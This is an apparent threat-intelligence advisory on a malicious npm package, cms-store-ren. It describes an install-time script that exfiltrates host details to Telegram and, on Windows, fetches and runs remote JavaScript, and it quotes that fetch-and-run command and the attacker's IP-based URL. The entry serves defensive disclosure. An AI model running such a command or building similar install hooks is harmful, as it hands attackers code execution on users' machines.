Supply-chain threat intelligence
Risk score: 92
Indexed incident for cms-store-ren (npm).
The package's scripts.install entry runs install.js on every npm install. The script unconditionally POSTs the installer's hostname, OS, and architecture to api.telegram.org using a hardcoded bot token and chat ID (install.js:7 sets BOT_TOKEN = '8877182499:...'; install.js:50-56 builds the message and sends it via sendTelegramMessage()).
On Windows, the same script writes a hidden PowerShell bootstrapper that installs Scoop/Winget and Deno, then executes deno -A http://77.90.185.225/deee80f30a6921b4.js. That command fetches an arbitrary JavaScript payload from a bare-IP HTTP URL and runs it with all Deno permissions under a hidden PowerShell window.
The package has no legitimate functionality (index.js only logs a string; the author is the placeholder work1 and the description is cms install) and exists solely to deliver the install-time payload. Two malicious behaviours are present: install-time exfiltration of host reconnaissance data, and install-time arbitrary remote code execution from attacker infrastructure.
The OpenSSF Package Analysis project identified 'cms-store-ren' @ 1.1.1 (npm) as malicious.
It is considered malicious because:
Affected versions
Indicators
Timeline